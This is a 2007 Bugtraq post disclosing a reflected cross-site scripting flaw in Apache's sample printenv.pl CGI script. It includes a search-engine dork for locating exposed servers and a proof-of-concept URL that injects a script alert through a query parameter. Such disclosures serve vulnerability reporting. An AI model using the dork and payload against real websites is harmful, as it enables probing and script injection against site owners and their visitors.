Bugtraq mailing list archives
printenv.pl(all versions) cross site scripting Vulnerability
From: hadihadi_zedehal_2006 () yahoo com
Date: 24 Jul 2007 14:42:39 -0000
################################################################################ #...:::::printenv.pl(all versions) cross site scripting Vulnerability::::.... # ################################################################################ Virangar Security Team www.virangar.org -------- Discoverd By : hadihadi & black.shadowes special tnx to:MR.nosrati,MR.hesy,satan,IGI,zahra & all virangar members & all iranian hackerz greetz:to my best friend in the world hadi_aryaie2004 ----------------------------------- dork: inurl:/cgi-bin/printenv.pl ----------------------------------- vlu: http://www.site.com/cgi-bin/printenv.pl?acuparam=>"><ScRiPt>alert('xss')</ScRiPt>. ------------------------------------- it's better using IE for test xss vlu ------------------------------------- coment: when y0u Installing and configuring Apache or install a local host on your pc in the cgi-bin folder there is a perl program called printenv.pl which you can use to test if your Perl installation is working in combination with the Apache HTTP server. --- i dont know who vendor the printenv.pl
Current thread:
- printenv.pl(all versions) cross site scripting Vulnerability hadihadi_zedehal_2006 (Jul 24)